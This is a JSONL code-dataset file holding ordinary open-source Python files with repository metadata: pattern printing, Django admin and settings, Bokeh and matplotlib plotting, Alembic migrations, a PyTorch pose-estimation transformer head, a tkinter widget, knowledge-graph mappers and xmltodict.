+{"seq_id":"42629579831","text":"lines = int(input('Enter the number of rows: '))\r\nlines_nei = int(input('Enter the number of rows to hollow out: '))\r\ntao = 1\r\nfor top_line in range(1, lines + 1):\r\n # print(type(line),line)\r\n numbers = 2 * top_line - 1\r\n lastNumbers = 2 * lines - 1\r\n spaces = lastNumbers // 2 - (numbers // 2)\r\n for space in range(spaces):\r\n print(' ', end='')\r\n \r\n a = lines - lines_nei\r\n for number in range(1, numbers + 1):\r\n if top_line > a:\r\n #print(tao,((a + 1) * 2 - 1) // 2 + (2 * tao - 1),end='')\r\n if ((a + 1) * 2 - 1) // 2 < number <= ((a + 1) * 2 - 1) // 2 + (2 * tao - 1):\r\n print(' ', end='')\r\n else:\r\n print('*', end='')\r\n else:\r\n print('*', end='')\r\n if top_line > a and tao < lines_nei:\r\n # print('ok')\r\n tao += 1\r\n print('')\r\n if number == lastNumbers:\r\n underNumbers = lastNumbers - 2\r\n underLinesNei = tao-1\r\n #print(underLinesNei)\r\n for under_line in range(1, lines):\r\n spaces = lastNumbers // 2 - (underNumbers // 2)\r\n for space in range(spaces):\r\n print(' ', end='')\r\n #print(underNumbers // 2)\r\n for number in range(underNumbers):\r\n if underLinesNei > 0:\r\n if (underNumbers // 2)-(underLinesNei*2-1)//2-1 < number < (underNumbers // 2)+(underLinesNei*2-1)//2+1:\r\n print(' ', end='')\r\n else:\r\n print('*', end='')\r\n else:\r\n print('*', end='')\r\n print('')\r\n underNumbers -= 2\r\n underLinesNei -= 1\r\n","repo_name":"Luoyuequan/project","sub_path":"中空_小星星.py","file_name":"中空_小星星.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"24725364847","text":"from django.contrib import admin\nfrom docfield.modelfields import 
JSONField\nimport tagging.models as tags\nimport twemoir.models as tm\nfrom twemoir.lib.adminfields.widgets import JsonPairInputs\n\nclass TMTweetHashtagFilter(admin.SimpleListFilter):\n title = u\"Hashtag\"\n parameter_name = 'hashtag'\n def __init__(self, request, params, model, model_admin):\n self.__model__ = model\n self.title = u\"Hashtag (%s)\" % len(list(tags.Tag.objects.usage_for_model(self.__model__)))\n super(TMTweetHashtagFilter, self).__init__(request, params, model, model_admin)\n \n def lookups(self, request, model_admin):\n tags = model_admin.queryset(request).tags()\n return [(str(t.name), u\"#%s%s (%s)\" % (\n t.name[:15],\n len(t.name) > 15 and u\"…\" or u\"\",\n t.items.count())) for t in sorted(tags,\n key=lambda t: t.items.count(), reverse=True)]\n \n def queryset(self, request, queryset):\n tagged = queryset.tagged(self.value())\n return tagged.count() > 0 and tagged or queryset.all()\n\n# class TMTweeterFilter(admin.SimpleListFilter):\n# title = u\"Tweeter\"\n# parameter_name = 'tweeter'\n# def __init__(self, request, params, model, model_admin):\n# import simplejson as json\n# self.__model__ = model\n# self._structs = [json.loads(ts[0])['user_mentions'] \\\n# for ts in TMTweet.objects.filter(\n# tweet_struct__icontains='user_mentions'\n# ).values_list('tweet_struct')]\n# self._screen_names = set(map(\n# lambda u: u['screen_name'], reduce(\n# lambda a, b: a+b, structs)))\n# self.title = u\"Tweeter (%s)\" % len(self._screen_names)\n# super(TMTweeterFilter, self).__init__(request, params, model, model_admin)\n# \n# def lookups(self, request, model_admin):\n# return [(str(t.name), u\"#%s%s (%s)\" % (\n# t.name[:15],\n# len(t.name) > 15 and u\"…\" or u\"\",\n# t.items.count())) for t in sorted(tags,\n# key=lambda t: t.items.count(), reverse=True)]\n# \n# def queryset(self, request, queryset):\n# tagged = queryset.tagged(self.value())\n# return tagged.count() > 0 and tagged or queryset.all()\n\n\n\nclass TMTweetAdmin(admin.ModelAdmin):\n ordering = ('status_id', 'id',)\n list_display = ('status_id','with_hashtags','text','user_id',)\n list_display_links = ('status_id',)\n list_filter = (TMTweetHashtagFilter,)\n \n search_fields = ['status_id','user_id','text','tweet_struct','_tags',]\n \n formfield_overrides = {\n JSONField: { 'widget': JsonPairInputs },\n }\n \n def with_hashtags(self, obj):\n return ', '.join([u\"#%s\" % t.name for t in obj.tags])\n with_hashtags.short_description = \"Hashtags in Tweet\"\n with_hashtags.allow_tags = True\n \n\nadmin.site.register(tm.TMTweet, TMTweetAdmin)\nadmin.site.register(tm.TMStagedTweet)\nadmin.site.register(tm.TMAppKeyset)\nadmin.site.register(tm.TMUserKeyset)","repo_name":"fish2000/django-twemoir","sub_path":"twemoir/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"20126506056","text":"import numpy as np\nfrom tornado.ioloop import IOLoop\n\nfrom bokeh.application.handlers import FunctionHandler\nfrom bokeh.application import Application\nfrom bokeh.layouts import column\nfrom bokeh.models import ColumnDataSource, Slider\nfrom bokeh.plotting import figure\nfrom bokeh.server.server import Server\n\nio_loop = IOLoop.current()\n\n\nclass Test:\n def __init__(self):\n x = np.linspace(0, 10, 1000)\n y = np.log(x) * np.sin(x)\n\n source = ColumnDataSource(data=dict(x=x, y=y))\n\n plot = figure()\n plot.line('x', 'y', source=source)\n\n slider = Slider(start=1, end=10, value=1, step=0.1)\n\n def 
callback(attr, old, new):\n y = np.log(x) * np.sin(x*new)\n source.data = dict(x=x, y=y)\n\n slider.on_change('value', callback)\n\n bokeh_app = Application(FunctionHandler(\n lambda doc: doc.add_root(column(plot))\n ))\n\n bokeh_app.on_server_loaded = lambda x: print(\"Server loaded\")\n bokeh_app.on_session_created = lambda x: print(\"Session created\")\n bokeh_app.on_server_unloaded = lambda x: print(\"Server unloaded\")\n bokeh_app.on_session_destroyed = lambda x: print(\"Session destroyed\")\n\n server = Server({'/': bokeh_app}, io_loop=io_loop)\n server.start()\n server.run_until_shutdown()\n\n\nif __name__ == '__main__':\n Test()","repo_name":"cosmoscope/cosmos-client-qt","sub_path":"cosmos_client_qt/plotters/bokeh/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"30306014818","text":"import os\nos.system(\"clear\")\nfrom numpy import loadtxt\nfrom pylab import plot,show\n\nb=loadtxt(\"sunspots.txt\",float)\n\nx1,y1=b[:,0],b[:,1]\nx2,y2=b[0:1000,0],b[0:1000,1]\n\nprint(\"n= \",len(x2))\n\n\nplot(x1,y1)\nshow()\nplot(x2,y2)\n\n\nshow()\n","repo_name":"fiscompunipamplona/tll-mn-sunspot-sebastian408","sub_path":"Clase.py","file_name":"Clase.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19110406892","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# __date__ : 2019-03-19 20:23\n# __author__ : \"Zero, by DevOps学院\"\n# __file__ : dev.py\nimport os\nDEBUG = True\nTIME_ZONE = 'Asia/Shanghai'\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, '../adminbackend.db'),\n }\n}\n","repo_name":"ziyilongwang/Adminoms","sub_path":"adminbackend/adminbackend/adminbackend/settings/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"40294463547","text":"from __future__ import with_statement\n\nimport logging\nimport os\nfrom logging.config import fileConfig\n\nfrom alembic import context\nfrom alembic.config import Config\n\nfrom aim.web.configs import AIM_ENV_MODE_KEY\nfrom aim.web.api.db import engine\nfrom aim.web.utils import get_db_url\nfrom aim.web.api.dashboards import models\nfrom aim.web.api.dashboard_apps import models\nfrom aim.web.api.db import Base\n\n# this is the Alembic Config object, which provides\n# access to the values within the .ini file in use.\nconfig = context.config\n\nif os.getenv(AIM_ENV_MODE_KEY, 'prod') != 'prod':\n here = os.path.abspath(os.path.dirname(__file__))\n config = Config(os.path.join(here, 'alembic_dev.ini'))\n\n# Interpret the config file for Python logging.\n# This line sets up loggers basically.\nfileConfig(config.config_file_name)\nlogger = logging.getLogger('alembic.env')\n\n# add your model's MetaData object here\n# for 'autogenerate' support\ntarget_metadata = Base.metadata\n\n# other values from the config, defined by the needs of env.py,\n# can be acquired:\n# my_important_option = config.get_main_option(\"my_important_option\")\n# ... etc.\n\n\ndef run_migrations_offline():\n \"\"\"Run migrations in 'offline' mode.\n\n This configures the context with just a URL\n and not an Engine, though an Engine is acceptable\n here as well. 
By skipping the Engine creation\n we don't even need a DBAPI to be available.\n\n Calls to context.execute() here emit the given string to the\n script output.\n\n \"\"\"\n context.configure(\n url=get_db_url(), target_metadata=target_metadata, literal_binds=True\n )\n\n with context.begin_transaction():\n context.run_migrations()\n\n\ndef run_migrations_online():\n \"\"\"Run migrations in 'online' mode.\n\n In this scenario we need to create an Engine\n and associate a connection with the context.\n\n \"\"\"\n\n # this callback is used to prevent an auto-migration from being generated\n # when there are no changes to the schema\n # reference: http://alembic.zzzcomputing.com/en/latest/cookbook.html\n def process_revision_directives(context, revision, directives):\n if getattr(config.cmd_opts, 'autogenerate', False):\n script = directives[0]\n if script.upgrade_ops.is_empty():\n directives[:] = []\n logger.info('No changes in schema detected.')\n\n connectable = engine\n\n with connectable.connect() as connection:\n context.configure(\n connection=connection,\n target_metadata=target_metadata,\n process_revision_directives=process_revision_directives\n )\n\n with context.begin_transaction():\n context.run_migrations()\n\n\nif context.is_offline_mode():\n run_migrations_offline()\nelse:\n run_migrations_online()\n","repo_name":"aimhubio/aim","sub_path":"aim/web/migrations/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":4355,"dataset":"github-code","pt":"52"} +{"seq_id":"44536612378","text":"'''\nThe module contains classes and methods for configuring the button widget\n'''\n\nimport tkinter as tk\n\n\nclass Button:\n '''\n The class is used to create and place a button\n '''\n def __init__(self,\n text: str,\n background: str,\n command,\n x: int,\n y: int):\n\n # Creating a button\n self.button = tk.Button(text=text,\n background=background,\n font=(\"'Segoe', 19\"),\n command=command)\n # Button placement\n self.place(x=x, y=y)\n\n def place(self, x: int, y: int):\n '''\n The method places the button\n\n :param str x: vertical position\n :param str y: horizontal position\n '''\n self.button.place(x=x, y=y, width=115, height=79)\n","repo_name":"fomaaq/Desktop-Calculator","sub_path":"src/widgets/button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"34338628699","text":"from collections import Counter\nfrom enum import Enum, auto\nfrom typing import Union\nfrom urllib.parse import quote\n\nfrom mowgli_etl.model.concept_net_predicates import RELATED_TO\nfrom mowgli_etl.model.kg_edge import KgEdge\nfrom mowgli_etl.model.kg_node import KgNode\nfrom mowgli_etl.pipeline.swow.swow_constants import SWOW_DATASOURCE_ID, SWOW_NAMESPACE\n\n\"\"\" \nUtility methods for mapping SWOW data into MOWGLI CSKG data structures.\n\"\"\"\n\n\nclass SwowResponseType(Enum):\n R1 = auto()\n R2 = auto()\n R3 = auto()\n\n\ndef swow_node_id(word: str) -> str:\n return f\"{SWOW_NAMESPACE}:{quote(word)}\"\n\n\ndef swow_node(*, word: str, response_counts: Counter) -> KgNode:\n \"\"\"\n Create a cskg node from a SWOW cue or response.\n :param word: a SWOW cue or response\n :param response_counts: counts of responses to this word\n \"\"\"\n assert all(k in SwowResponseType.__members__ for k in response_counts.keys())\n return KgNode.legacy(\n datasource=SWOW_DATASOURCE_ID,\n id=swow_node_id(word),\n label=word,\n 
other={\n \"response_counts\": {\n rt: response_counts[rt] for rt in SwowResponseType.__members__.keys()\n }\n },\n )\n\n\ndef swow_edge(\n *,\n cue: Union[KgNode, str],\n response: Union[KgNode, str],\n cue_response_counts: Counter,\n response_counts: Counter,\n) -> KgEdge:\n \"\"\"\n Create a cskg edge from a SWOW cue, response, and strength value.\n :param cue: cue phrase\n :param response: response to the cue phrase\n :param cue_response_counts: total response counts for the cue\n :param response_counts: counts of this response to the cue\n \"\"\"\n assert all(k in SwowResponseType.__members__ for k in cue_response_counts.keys())\n assert all(k in SwowResponseType.__members__ for k in response_counts.keys())\n strength_r123 = sum(response_counts.values()) / sum(cue_response_counts.values())\n other = {\n \"response_counts\": {\n rt: response_counts[rt] for rt in SwowResponseType.__members__.keys()\n },\n \"response_strengths\": {\n rt: (\n response_counts[rt] / cue_response_counts[rt]\n if cue_response_counts[rt] > 0\n else 0\n )\n for rt in SwowResponseType.__members__.keys()\n },\n }\n return KgEdge.legacy(\n datasource=SWOW_DATASOURCE_ID,\n subject=cue.id if isinstance(cue, KgNode) else swow_node_id(cue),\n object=response.id if isinstance(response, KgNode) else swow_node_id(response),\n predicate=RELATED_TO,\n weight=strength_r123,\n other=other,\n )\n","repo_name":"tetherless-world/mowgli-etl","sub_path":"mowgli_etl/pipeline/swow/swow_mappers.py","file_name":"swow_mappers.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"4324407543","text":"import torch\nimport torch.nn as nn\nimport numpy as np\n\nfrom pomnet.models.utils.builder import TRANSFORMER\nfrom mmcv.runner.base_module import BaseModule\nfrom mmcv.cnn import (Conv2d, Linear, xavier_init, build_upsample_layer, ConvModule,\n constant_init, normal_init, build_conv_layer, build_norm_layer)\nfrom mmcv.cnn.bricks.transformer import (build_transformer_layer_sequence,\n build_positional_encoding)\n\nfrom mmpose.models import HEADS\nfrom mmpose.models.heads import TopdownHeatmapBaseHead\nfrom mmpose.models.builder import build_loss\nfrom mmpose.core.evaluation import pose_pck_accuracy\nfrom mmpose.core.evaluation.top_down_eval import keypoints_from_heatmaps\nfrom mmpose.models.utils.ops import resize\nfrom pomnet.models.utils import build_transformer\n\n\n@TRANSFORMER.register_module()\nclass Transformer(BaseModule):\n \"\"\"Implements the DETR transformer.\n Following the official DETR implementation, this module copy-paste\n from torch.nn.Transformer with modifications:\n * positional encodings are passed in MultiheadAttention\n * extra LN at the end of encoder is removed\n * decoder returns a stack of activations from all decoding layers\n See `paper: End-to-End Object Detection with Transformers\n `_ for details.\n Args:\n encoder (`mmcv.ConfigDict` | Dict): Config of\n TransformerEncoder. Defaults to None.\n decoder ((`mmcv.ConfigDict` | Dict)): Config of\n TransformerDecoder. 
Defaults to None\n init_cfg (obj:`mmcv.ConfigDict`): The Config for initialization.\n Defaults to None.\n \"\"\"\n\n def __init__(self, encoder=None, decoder=None, init_cfg=None):\n super(Transformer, self).__init__(init_cfg=init_cfg)\n self.encoder = build_transformer_layer_sequence(encoder)\n self.decoder = build_transformer_layer_sequence(decoder)\n self.embed_dims = self.encoder.embed_dims\n\n def init_weights(self):\n # follow the official DETR to init parameters\n for m in self.modules():\n if hasattr(m, 'weight') and m.weight.dim() > 1:\n xavier_init(m, distribution='uniform')\n self._is_init = True\n\n def forward(self, x, mask, query_embed, pos_embed, mask_query):\n \"\"\"Forward function for `Transformer`.\n Args:\n x (Tensor): Input query with shape [bs, c, h, w] where\n c = embed_dims.\n mask (Tensor): The key_padding_mask used for encoder and decoder,\n with shape [bs, h, w].\n query_embed (Tensor): The query embedding for decoder, with shape\n [num_query, c].\n pos_embed (Tensor): The positional encoding for encoder and\n decoder, with the same shape as `x`.\n Returns:\n tuple[Tensor]: results of decoder containing the following tensor.\n - out_dec: Output from decoder. If return_intermediate_dec \\\n is True output has shape [num_dec_layers, bs,\n num_query, embed_dims], else has shape [1, bs, \\\n num_query, embed_dims].\n - memory: Output results from encoder, with shape \\\n [bs, embed_dims, h, w].\n\n Notes:\n x: query image features with shape [bs, c, h, w]\n mask: mask for x with shape [bs, h, w]\n pos_embed: positional embedding for x with shape [bs, c, h, w]\n query_embed: sample keypoint features with shape [bs, num_query, c]\n mask_query: mask for query_embed with shape [bs, num_query]\n Outputs:\n out_dec: [num_layers, bs, num_query, c]\n memory: [bs, c, h, w]\n\n \"\"\"\n bs, c, h, w = x.shape\n # use `view` instead of `flatten` for dynamically exporting to ONNX\n x = x.view(bs, c, -1).permute(2, 0, 1) # [bs, c, h, w] -> [h*w, bs, c]\n mask = mask.view(bs, -1) # [bs, h, w] -> [bs, h*w]\n pos_embed = pos_embed.view(bs, c, -1).permute(2, 0, 1)\n memory = self.encoder(\n query=x,\n key=None,\n value=None,\n query_pos=pos_embed,\n query_key_padding_mask=mask)\n\n query_embed = query_embed.permute(1, 0, 2) # [bs, num_query, c] -> [num_query, bs, c]\n # target = torch.zeros_like(query_embed)\n # out_dec: [num_layers, num_query, bs, c]\n out_dec = self.decoder(\n query=query_embed,\n key=memory,\n value=memory,\n key_pos=pos_embed,\n # query_pos=query_embed,\n query_key_padding_mask=mask_query,\n key_padding_mask=mask)\n out_dec = out_dec.transpose(1, 2)\n memory = memory.permute(1, 2, 0).reshape(bs, c, h, w)\n return out_dec, memory\n\n\nclass RelationModel(nn.Module):\n \"\"\"\n Generic Matching Network from Lu et al 2018\n Clas Agnostic Counting.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels):\n super(RelationModel, self).__init__()\n\n self.pool = nn.AdaptiveAvgPool2d(1)\n\n self.conv = ConvModule(\n in_channels,\n out_channels,\n kernel_size=3,\n stride=1,\n padding=1,\n norm_cfg=dict(type='BN', requires_grad=True),\n inplace=True)\n\n def forward(self, pooled_feature_s, feature_q):\n \"\"\"Forward function.\"\"\"\n\n feature_sample = pooled_feature_s.expand_as(feature_q).clone()\n feature = torch.cat((feature_q, feature_sample), dim=1)\n\n feature = self.conv(feature)\n\n return feature\n\n\n@HEADS.register_module()\nclass TransformerHead(TopdownHeatmapBaseHead):\n\n def __init__(self,\n in_channels,\n transformer=None,\n positional_encoding=dict(\n 
type='SinePositionalEncoding',\n num_feats=128,\n normalize=True),\n num_deconv_layers=3,\n num_deconv_filters=(256, 256, 256),\n num_deconv_kernels=(4, 4, 4),\n extra=None,\n loss_keypoint=None,\n train_cfg=None,\n test_cfg=None):\n # NOTE here use `AnchorFreeHead` instead of `TransformerHead`,\n # since it brings inconvenience when the initialization of\n # `AnchorFreeHead` is called.\n super().__init__()\n\n out_channels = 1\n self.in_channels = in_channels\n self.positional_encoding = build_positional_encoding(\n positional_encoding)\n self.transformer = build_transformer(transformer)\n self.embed_dims = self.transformer.embed_dims\n assert 'num_feats' in positional_encoding\n num_feats = positional_encoding['num_feats']\n assert num_feats * 2 == self.embed_dims, 'embed_dims should' \\\n f' be exactly 2 times of num_feats. Found {self.embed_dims}' \\\n f' and {num_feats}.'\n\n self.relation_model = RelationModel(self.embed_dims * 2, self.embed_dims)\n\n if extra is not None and not isinstance(extra, dict):\n raise TypeError('extra should be dict or None.')\n\n if num_deconv_layers > 0:\n self.deconv_layers = self._make_deconv_layer(\n num_deconv_layers,\n num_deconv_filters,\n num_deconv_kernels,\n )\n elif num_deconv_layers == 0:\n self.deconv_layers = nn.Identity()\n else:\n raise ValueError(\n f'num_deconv_layers ({num_deconv_layers}) should >= 0.')\n\n identity_final_layer = False\n if extra is not None and 'final_conv_kernel' in extra:\n assert extra['final_conv_kernel'] in [0, 1, 3]\n if extra['final_conv_kernel'] == 3:\n padding = 1\n elif extra['final_conv_kernel'] == 1:\n padding = 0\n else:\n # 0 for Identity mapping.\n identity_final_layer = True\n kernel_size = extra['final_conv_kernel']\n else:\n kernel_size = 1\n padding = 0\n\n if identity_final_layer:\n self.final_layer = nn.Identity()\n else:\n assert num_deconv_layers > 0\n conv_channels = num_deconv_filters[\n -1]\n\n layers = []\n if extra is not None:\n num_conv_layers = extra.get('num_conv_layers', 0)\n num_conv_kernels = extra.get('num_conv_kernels',\n [1] * num_conv_layers)\n\n for i in range(num_conv_layers):\n layers.append(\n build_conv_layer(\n dict(type='Conv2d'),\n in_channels=conv_channels,\n out_channels=conv_channels,\n kernel_size=num_conv_kernels[i],\n stride=1,\n padding=(num_conv_kernels[i] - 1) // 2))\n layers.append(\n build_norm_layer(dict(type='BN'), conv_channels)[1])\n layers.append(nn.ReLU(inplace=True))\n\n layers.append(\n build_conv_layer(\n cfg=dict(type='Conv2d'),\n in_channels=conv_channels,\n out_channels=out_channels,\n kernel_size=kernel_size,\n stride=1,\n padding=padding))\n\n if len(layers) > 1:\n self.final_layer = nn.Sequential(*layers)\n else:\n self.final_layer = layers[0]\n\n self.loss = build_loss(loss_keypoint)\n self.train_cfg = {} if train_cfg is None else train_cfg\n self.test_cfg = {} if test_cfg is None else test_cfg\n self.target_type = self.test_cfg.get('target_type', 'GaussianHeatMap')\n\n self._init_layers()\n\n def _make_deconv_layer(self, num_layers, num_filters, num_kernels):\n \"\"\"Make deconv layers.\"\"\"\n if num_layers != len(num_filters):\n error_msg = f'num_layers({num_layers}) ' \\\n f'!= length of num_filters({len(num_filters)})'\n raise ValueError(error_msg)\n if num_layers != len(num_kernels):\n error_msg = f'num_layers({num_layers}) ' \\\n f'!= length of num_kernels({len(num_kernels)})'\n raise ValueError(error_msg)\n\n deconv_in_channels = self.embed_dims\n\n layers = []\n for i in range(num_layers):\n kernel, padding, output_padding = \\\n 
self._get_deconv_cfg(num_kernels[i])\n\n planes = num_filters[i]\n layers.append(\n build_upsample_layer(\n dict(type='deconv'),\n in_channels=deconv_in_channels,\n out_channels=planes,\n kernel_size=kernel,\n stride=2,\n padding=padding,\n output_padding=output_padding,\n bias=False))\n layers.append(nn.BatchNorm2d(planes))\n layers.append(nn.ReLU(inplace=True))\n deconv_in_channels = planes\n\n return nn.Sequential(*layers)\n\n def _init_layers(self):\n \"\"\"Initialize layers of the transformer head.\"\"\"\n self.input_proj = Conv2d(\n self.in_channels, self.embed_dims, kernel_size=1)\n self.query_proj = Linear(\n self.in_channels, self.embed_dims)\n\n def init_weights(self):\n \"\"\"Initialize weights of the transformer head.\"\"\"\n # The initialization for transformer is important\n self.transformer.init_weights()\n\n for m in self.relation_model.modules():\n if isinstance(m, nn.Conv2d):\n normal_init(m, std=0.001, bias=0)\n elif isinstance(m, nn.BatchNorm2d):\n constant_init(m, 1)\n\n for _, m in self.deconv_layers.named_modules():\n if isinstance(m, nn.ConvTranspose2d):\n normal_init(m, std=0.001)\n elif isinstance(m, nn.BatchNorm2d):\n constant_init(m, 1)\n\n for m in self.final_layer.modules():\n if isinstance(m, nn.Conv2d):\n normal_init(m, std=0.001, bias=0)\n elif isinstance(m, nn.BatchNorm2d):\n constant_init(m, 1)\n\n def forward(self, x, feature_s, target_s, mask_s):\n \"\"\"\"Forward function for a single feature level.\n\n Args:\n x (Tensor): Input feature from backbone's single stage, shape\n [bs, c, h, w].\n\n Returns:\n all_cls_scores (Tensor): Outputs from the classification head,\n shape [nb_dec, bs, num_query, cls_out_channels]. Note\n cls_out_channels should includes background.\n all_bbox_preds (Tensor): Sigmoid outputs from the regression\n head with normalized coordinate format (cx, cy, w, h).\n Shape [nb_dec, bs, num_query, 4].\n \"\"\"\n # construct binary masks which used for the transformer.\n # NOTE following the official DETR repo, non-zero values representing\n # ignored positions, while zero values means valid positions.\n\n # process query image feature\n x = self.input_proj(x)\n masks = x.new_zeros((x.shape[0], x.shape[2], x.shape[3])).to(torch.bool)\n pos_embed = self.positional_encoding(masks) # [bs, embed_dim, h, w]\n\n # process keypoint token feature\n # query_embed: [bs, num_query, c]\n # masks_query: [bs, num_query]\n query_embed_list = []\n for feature, target in zip(feature_s, target_s):\n resized_feature = resize(\n input=feature,\n size=target.shape[-2:],\n mode='bilinear',\n align_corners=False)\n target = target / (target.sum(dim=-1).sum(dim=-1)[:, :, None, None] + 1e-8)\n query_embed = target.flatten(2) @ resized_feature.flatten(2).permute(0, 2, 1)\n query_embed_list.append(query_embed)\n query_embed = torch.mean(torch.stack(query_embed_list, dim=0), 0)\n query_embed = query_embed * mask_s\n query_embed = self.query_proj(query_embed)\n masks_query = (~mask_s.to(torch.bool)).squeeze(-1)\n\n # outs_dec: [nb_dec, bs, num_query, c]\n # memory: [bs, c, h, w]\n outs_dec, memory = self.transformer(x, masks, query_embed,\n pos_embed, masks_query)\n out_dec = outs_dec[-1] # [bs, num_query, c]\n\n heatmaps = []\n for kpt in range(out_dec.shape[1]):\n pooled_feature_s = out_dec[:, kpt].unsqueeze(-1).unsqueeze(-1)\n feature = self.relation_model(pooled_feature_s, memory)\n heatmap = self.deconv_layers(feature)\n heatmap = self.final_layer(heatmap)\n heatmaps.append(heatmap)\n heatmaps = torch.cat(heatmaps, dim=1)\n\n return heatmaps\n\n def 
get_loss(self, output, target, target_weight):\n \"\"\"Calculate top-down keypoint loss.\n\n Note:\n batch_size: N\n num_keypoints: K\n heatmaps height: H\n heatmaps width: W\n\n Args:\n output (torch.Tensor[NxKxHxW]): Output heatmaps.\n target (torch.Tensor[NxKxHxW]): Target heatmaps.\n target_weight (torch.Tensor[NxKx1]):\n Weights across different joint types.\n \"\"\"\n\n losses = dict()\n\n assert not isinstance(self.loss, nn.Sequential)\n assert target.dim() == 4 and target_weight.dim() == 3\n losses['mse_loss'] = self.loss(output, target, target_weight)\n\n return losses\n\n def get_accuracy(self, output, target, target_weight):\n \"\"\"Calculate accuracy for top-down keypoint loss.\n\n Note:\n batch_size: N\n num_keypoints: K\n heatmaps height: H\n heatmaps width: W\n\n Args:\n output (torch.Tensor[NxKxHxW]): Output heatmaps.\n target (torch.Tensor[NxKxHxW]): Target heatmaps.\n target_weight (torch.Tensor[NxKx1]):\n Weights across different joint types.\n \"\"\"\n\n accuracy = dict()\n\n if self.target_type == 'GaussianHeatMap':\n _, avg_acc, _ = pose_pck_accuracy(\n output.detach().cpu().numpy(),\n target.detach().cpu().numpy(),\n target_weight.detach().cpu().numpy().squeeze(-1) > 0,\n thr=0.2)\n accuracy['acc_pose'] = float(avg_acc)\n\n return accuracy\n\n def decode(self, img_metas, output, **kwargs):\n \"\"\"Decode keypoints from heatmaps.\n\n Args:\n img_metas (list(dict)): Information about data augmentation\n By default this includes:\n - \"image_file: path to the image file\n - \"center\": center of the bbox\n - \"scale\": scale of the bbox\n - \"rotation\": rotation of the bbox\n - \"bbox_score\": score of bbox\n output (np.ndarray[N, K, H, W]): model predicted heatmaps.\n \"\"\"\n batch_size = len(img_metas)\n\n if 'bbox_id' in img_metas[0] or 'query_bbox_id' in img_metas[0]:\n bbox_ids = []\n else:\n bbox_ids = None\n\n c = np.zeros((batch_size, 2), dtype=np.float32)\n s = np.zeros((batch_size, 2), dtype=np.float32)\n image_paths = []\n score = np.ones(batch_size)\n for i in range(batch_size):\n c[i, :] = img_metas[i]['query_center']\n s[i, :] = img_metas[i]['query_scale']\n image_paths.append(img_metas[i]['query_image_file'])\n\n if 'query_bbox_score' in img_metas[i]:\n score[i] = np.array(img_metas[i]['query_bbox_score']).reshape(-1)\n if 'bbox_id' in img_metas[i]:\n bbox_ids.append(img_metas[i]['bbox_id'])\n elif 'query_bbox_id' in img_metas[i]:\n bbox_ids.append(img_metas[i]['query_bbox_id'])\n\n preds, maxvals = keypoints_from_heatmaps(\n output,\n c,\n s,\n unbiased=self.test_cfg.get('unbiased_decoding', False),\n post_process=self.test_cfg.get('post_process', 'default'),\n kernel=self.test_cfg.get('modulate_kernel', 11),\n valid_radius_factor=self.test_cfg.get('valid_radius_factor',\n 0.0546875),\n use_udp=self.test_cfg.get('use_udp', False),\n target_type=self.test_cfg.get('target_type', 'GaussianHeatMap'))\n\n all_preds = np.zeros((batch_size, preds.shape[1], 3), dtype=np.float32)\n all_boxes = np.zeros((batch_size, 6), dtype=np.float32)\n all_preds[:, :, 0:2] = preds[:, :, 0:2]\n all_preds[:, :, 2:3] = maxvals\n all_boxes[:, 0:2] = c[:, 0:2]\n all_boxes[:, 2:4] = s[:, 0:2]\n all_boxes[:, 4] = np.prod(s * 200.0, axis=1)\n all_boxes[:, 5] = score\n\n result = {}\n\n result['preds'] = all_preds\n result['boxes'] = all_boxes\n result['image_paths'] = image_paths\n result['bbox_ids'] = bbox_ids\n\n return 
result\n","repo_name":"luminxu/Pose-for-Everything","sub_path":"pomnet/models/keypoint_heads/transformer_head.py","file_name":"transformer_head.py","file_ext":"py","file_size_in_byte":19375,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"52"} +{"seq_id":"37024319231","text":"#Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\carbon\\common\\lib\\xmltodict.py\r\nfrom xml.parsers import expat\r\nfrom xml.sax.saxutils import XMLGenerator\r\nfrom xml.sax.xmlreader import AttributesImpl\r\ntry:\r\n from cStringIO import StringIO\r\nexcept ImportError:\r\n try:\r\n from StringIO import StringIO\r\n except ImportError:\r\n from io import StringIO\r\n\r\ntry:\r\n from collections import OrderedDict\r\nexcept ImportError:\r\n OrderedDict = dict\r\n\r\ntry:\r\n _basestring = basestring\r\nexcept NameError:\r\n _basestring = str\r\n\r\ntry:\r\n _unicode = unicode\r\nexcept NameError:\r\n _unicode = str\r\n\r\n__author__ = 'Martin Blech'\r\n__version__ = '0.4.4'\r\n__license__ = 'MIT'\r\n\r\nclass ParsingInterrupted(Exception):\r\n pass\r\n\r\n\r\nclass _DictSAXHandler(object):\r\n\r\n def __init__(self, item_depth = 0, item_callback = lambda *args: True, xml_attribs = True, attr_prefix = '@', cdata_key = '#text', force_cdata = False, cdata_separator = '', postprocessor = None, dict_constructor = OrderedDict):\r\n self.path = []\r\n self.stack = []\r\n self.data = None\r\n self.item = None\r\n self.item_depth = item_depth\r\n self.xml_attribs = xml_attribs\r\n self.item_callback = item_callback\r\n self.attr_prefix = attr_prefix\r\n self.cdata_key 